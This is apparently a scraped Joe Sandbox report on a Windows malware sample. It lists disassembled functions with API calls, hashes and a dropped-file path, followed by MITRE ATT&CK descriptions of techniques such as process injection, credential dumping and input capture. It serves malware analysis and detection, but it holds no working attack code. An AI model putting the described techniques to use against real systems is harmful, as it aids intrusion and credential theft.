Download Yara Rule

APIs

DeleteFileW.KERNEL32(R'A,?,00412752,?,?,?,74B06490), ref: 0041764D
GetLastError.KERNEL32(?,00412752,?,?,?,74B06490), ref: 00417657
__dosmaperr.LIBCMT ref: 0041765E

Strings

R'A, xrefs: 0041764A

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: DeleteErrorFileLast__dosmaperr
String ID: R'A
API String ID: 1545401867-1265098927
Opcode ID: 642908a0dadcc0e497a82d1997887354a94cf152b244e97cb43b380a1c2970e3
Instruction ID: 056ef9c38fad87361dd2ee2fac34696856f64910ee6b24fca729f867d5a66b34
Opcode Fuzzy Hash: 642908a0dadcc0e497a82d1997887354a94cf152b244e97cb43b380a1c2970e3
Instruction Fuzzy Hash: B5D02232308208378B202FF6BC0C86B3F1C8E803343400676F82CC02A0DE39C8928548

Uniqueness

Uniqueness Score: -1.00%

Function 0041980A, Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00419891

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 9c1b9633bf2ebb0c38044de2cea86c35c0b20e39aea4a82805dce46aa4bcbc2e
Instruction ID: 51dd6c2606d8ee6ab780d3f4d9c04dd90bd10e112defb2bea4422d3243e9041d
Opcode Fuzzy Hash: 9c1b9633bf2ebb0c38044de2cea86c35c0b20e39aea4a82805dce46aa4bcbc2e
Instruction Fuzzy Hash: C9B13631A042859FDB15CF28C8A17EFBBE5EF55340F18816BD8459B341D63C9D85CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0042166E, Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0042173E
_free.LIBCMT ref: 00421767
SetEndOfFile.KERNEL32(00000000,0041DB46,00000000,0041649E,?,?,?,?,?,?,?,0041DB46,0041649E,00000000), ref: 00421799
GetLastError.KERNEL32(?,?,?,?,?,?,?,0041DB46,0041649E,00000000,?,?,?,?,00000000), ref: 004217B5

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: 1d4e9ec271f61be39408e0f53894346d0ad6f4d8c416210fc8434fcbe1c2efc6
Instruction ID: 80fe763155066d25bc738927a31a90460181cdf22703c0b18c745a4a2f417d93
Opcode Fuzzy Hash: 1d4e9ec271f61be39408e0f53894346d0ad6f4d8c416210fc8434fcbe1c2efc6
Instruction Fuzzy Hash: 2C41E7327006109BDB116FA9DC42ADE37A5AFD4324F64015BF414A72B1DA3CC9418769

Uniqueness

Uniqueness Score: -1.00%

Function 004042C0, Relevance: 6.1, APIs: 4, Instructions: 122COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C,?,?,00000000), ref: 00404316

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 9f25fc46c2af95f16febddea951af0b2b6a834bf5c0aba4fa4e59b8eebc81262
Instruction ID: b1866154cfddb4dac31c13f9ec77a105ffe874a5ee84853c0929edc8f9c117d0
Opcode Fuzzy Hash: 9f25fc46c2af95f16febddea951af0b2b6a834bf5c0aba4fa4e59b8eebc81262
Instruction Fuzzy Hash: 243117B0D002189BDB24BB68DC4A7DEB774EF81314F90427AED00772C2E7785A8587D9

Uniqueness

Uniqueness Score: -1.00%

Function 0041AE04, Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 00412687: _free.LIBCMT ref: 00412695

Part of subcall function 0041BDDB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,004211E0,?,00000000,00000000), ref: 0041BE7D

GetLastError.KERNEL32 ref: 0041AE6C
__dosmaperr.LIBCMT ref: 0041AE73
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041AEB2
__dosmaperr.LIBCMT ref: 0041AEB9

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: e2f6fc43ebe751efd958d8d1b2d6c0bf8621aed1eccb8610b7cc89a1c4d6f35c
Instruction ID: d5f1c445b52c9297a7152783a309135c38ee1275822a5b0ae2c1d34220fc2f4b
Opcode Fuzzy Hash: e2f6fc43ebe751efd958d8d1b2d6c0bf8621aed1eccb8610b7cc89a1c4d6f35c
Instruction Fuzzy Hash: 5021B6716413096F9B216F668C818EB77ADEF00369710451BF924D7240D738EDA187AA

Uniqueness

Uniqueness Score: -1.00%

Function 00416EF2, Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00412605,?,?,?,?,00413272,?), ref: 00416EF7
_free.LIBCMT ref: 00416F54
_free.LIBCMT ref: 00416F8A
SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,00412605,?,?,?,?,00413272,?), ref: 00416F95

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 852b4ae23b028a4af4fb23b17b13b773876d0aefac8bd65328f9fc5d10f17929
Instruction ID: 0472474c4cb18511cf639f6e2006cacba2ff6693ea478f65ea0a6c2b79e989ad
Opcode Fuzzy Hash: 852b4ae23b028a4af4fb23b17b13b773876d0aefac8bd65328f9fc5d10f17929
Instruction Fuzzy Hash: 3311A7322481016AD71127757CC5AEB266A8BC0769767423FF628822E1EE2DCCD7561D

Uniqueness

Uniqueness Score: -1.00%

Function 00417049, Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0041320C,00416627,?,?,004156FE), ref: 0041704E
_free.LIBCMT ref: 004170AB
_free.LIBCMT ref: 004170E1
SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,0041320C,00416627,?,?,004156FE), ref: 004170EC

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 87bcaad31f16b68704539a7d688c55d0fd8762de236f982063fd85112bbfcfac
Instruction ID: 602c94f41faeec266911e98351360e536512a396ebf154ad71f51f9ede5ecbfd
Opcode Fuzzy Hash: 87bcaad31f16b68704539a7d688c55d0fd8762de236f982063fd85112bbfcfac
Instruction Fuzzy Hash: 0811E93134C7016AD7112775ACC1EEB2A7A8BC8379762433BF628822D1EE298CD6561D

Uniqueness

Uniqueness Score: -1.00%

Function 0041773C, Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,00000000,00000000,004178A1,00000000,?,0041E208,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 00417752
GetLastError.KERNEL32(?,0041E208,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,004178A1,00000000,00000104,?), ref: 0041775C
__dosmaperr.LIBCMT ref: 00417763

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 6190189ddc8ea3ca9bc940537e496306eefee21a36299e640c24df3594615067
Instruction ID: d310f4c861fde6e33b7d2ec2a6979ec69c74d72fe9a819ac1ea39020a7938a2a
Opcode Fuzzy Hash: 6190189ddc8ea3ca9bc940537e496306eefee21a36299e640c24df3594615067
Instruction Fuzzy Hash: AEF01232209115BB8B201FB6DC08D9BBF79FF453A17004526F529C6651DB35F8A2D7D4

Uniqueness

Uniqueness Score: -1.00%

Function 004177A5, Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,00000000,00000000,004178A1,00000000,?,0041E193,00000000,00000000,004178A1,?,?,00000000,00000000,00000001), ref: 004177BB
GetLastError.KERNEL32(?,0041E193,00000000,00000000,004178A1,?,?,00000000,00000000,00000001,00000000,00000000,?,004178A1,00000000,00000104), ref: 004177C5
__dosmaperr.LIBCMT ref: 004177CC

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 5f6eea01c1270f9e0c5a23a19c9b8f8dac992b5886479b52405833e54fea6283
Instruction ID: 7e40a06978a759b8191a295d3124cb90d66c456e90e2ee65387afcc0bcf2beb1
Opcode Fuzzy Hash: 5f6eea01c1270f9e0c5a23a19c9b8f8dac992b5886479b52405833e54fea6283
Instruction Fuzzy Hash: 6BF06231204115BB8B212FB6DC08C97BF79FF453607108526F529C6620CB35E8A1D7E4

Uniqueness

Uniqueness Score: -1.00%

Function 00421B95, Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00403D80,?,0042E0B8,00000000,00403D80,?,0041EFD2,00403D80,00000001,00403D80,00403D80,?,0041882C,00000000,?,00403D80), ref: 00421BAC
GetLastError.KERNEL32(?,0041EFD2,00403D80,00000001,00403D80,00403D80,?,0041882C,00000000,?,00403D80,00000000,00403D80,?,00418D80,00403D80), ref: 00421BB8

Part of subcall function 00421B7E: CloseHandle.KERNEL32(FFFFFFFE,00421BC8,?,0041EFD2,00403D80,00000001,00403D80,00403D80,?,0041882C,00000000,?,00403D80,00000000,00403D80), ref: 00421B8E

___initconout.LIBCMT ref: 00421BC8

Part of subcall function 00421B40: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00421B6F,0041EFBF,00403D80,?,0041882C,00000000,?,00403D80,00000000), ref: 00421B53

WriteConsoleW.KERNEL32(00403D80,?,0042E0B8,00000000,?,0041EFD2,00403D80,00000001,00403D80,00403D80,?,0041882C,00000000,?,00403D80,00000000), ref: 00421BDD

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 84c3088fa30d72e096a5c50f6d0c6a96ef9fbb6349433aca8dd31943ec956f96
Instruction ID: 7508bf37c0b866eb48b8223dddbefd80bf7eec2c8aa76b175be5957b4052d3e7
Opcode Fuzzy Hash: 84c3088fa30d72e096a5c50f6d0c6a96ef9fbb6349433aca8dd31943ec956f96
Instruction Fuzzy Hash: 3BF01C36204125BBCF221FE2EC14E8A3F26FF587A0F814065FB1889131D6329820DB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041583C, Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00415845

Part of subcall function 00416601: HeapFree.KERNEL32(00000000,00000000,?,004156FE), ref: 00416617
Part of subcall function 00416601: GetLastError.KERNEL32(?,?,004156FE), ref: 00416629

_free.LIBCMT ref: 00415858
_free.LIBCMT ref: 00415869
_free.LIBCMT ref: 0041587A

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 8819f9331d67d4a56e5fd11763de535f0137ff881198b71dfd3ed83d3ea7af30
Instruction ID: bac838c32c678229fa3b4a483e54889a55cc49d4a7793ec83d9a9c3f6b142d6f
Opcode Fuzzy Hash: 8819f9331d67d4a56e5fd11763de535f0137ff881198b71dfd3ed83d3ea7af30
Instruction Fuzzy Hash: 57E0EC79824160DA8B067F66BC85489BFF2F74AB15302683BF45052231CB3B55A69F8D

Uniqueness

Uniqueness Score: -1.00%

Function 0041BB79, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 166COMMON

Download Yara Rule

APIs

Part of subcall function 0041B70E: GetOEMCP.KERNEL32(00000000,0041B980,?,?,r2A,00413272,?), ref: 0041B739

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,r2A,0041B9C7,?,00000000,?,?,?,?,?,?,00413272), ref: 0041BBD7
GetCPInfo.KERNEL32(00000000,0041B9C7,?,r2A,0041B9C7,?,00000000,?,?,?,?,?,?,00413272,?), ref: 0041BC19

Strings

r2A, xrefs: 0041BB7B

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: CodeInfoPageValid
String ID: r2A
API String ID: 546120528-1151287387
Opcode ID: 0e8637989e4993241d1c32a5e8f4107befe1728470eddc0b8888d06dbba43e43
Instruction ID: cb7a38e09d00928650c17b9f6d2f9bc2a2ea41712e0b0e3e81b9b01a96bb2c91
Opcode Fuzzy Hash: 0e8637989e4993241d1c32a5e8f4107befe1728470eddc0b8888d06dbba43e43
Instruction Fuzzy Hash: 9851F170A002458EDB248F36C8956EBBBE5EF51304F14446FD0968B261EB7CA986CFD9

Uniqueness

Uniqueness Score: -1.00%

Function 00414EAB, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe, xrefs: 00414EEE, 00414EF5, 00414F2B

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe
API String ID: 0-1917590862
Opcode ID: be3400460d9357f97c9021c71b61faf066256e0bcc6631b7557c78e60f949d16
Instruction ID: 7b11db002fd7e9e53be5450ed18239a6e5ba10cc8c9f17be66461777073e512c
Opcode Fuzzy Hash: be3400460d9357f97c9021c71b61faf066256e0bcc6631b7557c78e60f949d16
Instruction Fuzzy Hash: 37417071A00219ABDB15EF9ADC81DEEBBF8EBC5310F14006BF404E7351D7799A828798

Uniqueness

Uniqueness Score: -1.00%

Function 004124F6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

Part of subcall function 00412687: _free.LIBCMT ref: 00412695

Part of subcall function 00416B38: MultiByteToWideChar.KERNEL32(0041BC0F,00000100,E8458D00,00000000,00000000,00000020,?,0041C9D9,00000000,00000000,00000100,00000020,00000000,00000000,E8458D00,00000100), ref: 00416BA8

GetLastError.KERNEL32(?,?,?,?,?,?,?,0041273E,00000000,?,00000000,74B06490), ref: 0041255A
__dosmaperr.LIBCMT ref: 00412561

Strings

>'A, xrefs: 0041254B

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr_free
String ID: >'A
API String ID: 4030486722-178967275
Opcode ID: ab9024e51e0104fd8b294d5d1172b578431542296d16423e4acb7a43171e9141
Instruction ID: 1aa7fb2d1d102b946e5f05d26dda23fdd84d3a3ca217f9aa1a003a6fbff7dc87
Opcode Fuzzy Hash: ab9024e51e0104fd8b294d5d1172b578431542296d16423e4acb7a43171e9141
Instruction Fuzzy Hash: 14212B71600211BBCF209F26CE51A9B7B96EF80364F11411BF829D7290D7B8E9A18B98

Uniqueness

Uniqueness Score: -1.00%

Function 0041B70E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

GetOEMCP.KERNEL32(00000000,0041B980,?,?,r2A,00413272,?), ref: 0041B739
GetACP.KERNEL32(00000000,0041B980,?,?,r2A,00413272,?), ref: 0041B750

Strings

r2A, xrefs: 0041B710

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID:
String ID: r2A
API String ID: 0-1151287387
Opcode ID: 1f1c858023cde7c3ae9e00b3174a838788c5482dec37b318ac1a0eb7deb11b4b
Instruction ID: ebaaed82b8919cd5142a880f57eb5bb402663650fefc447be64845ac600d0c65
Opcode Fuzzy Hash: 1f1c858023cde7c3ae9e00b3174a838788c5482dec37b318ac1a0eb7deb11b4b
Instruction Fuzzy Hash: BBF062349002049BD720DB65D8587A977B4EB81339F604256E4358A6F1CBB5A8C5CF8A

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report xuTyOmef1g.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
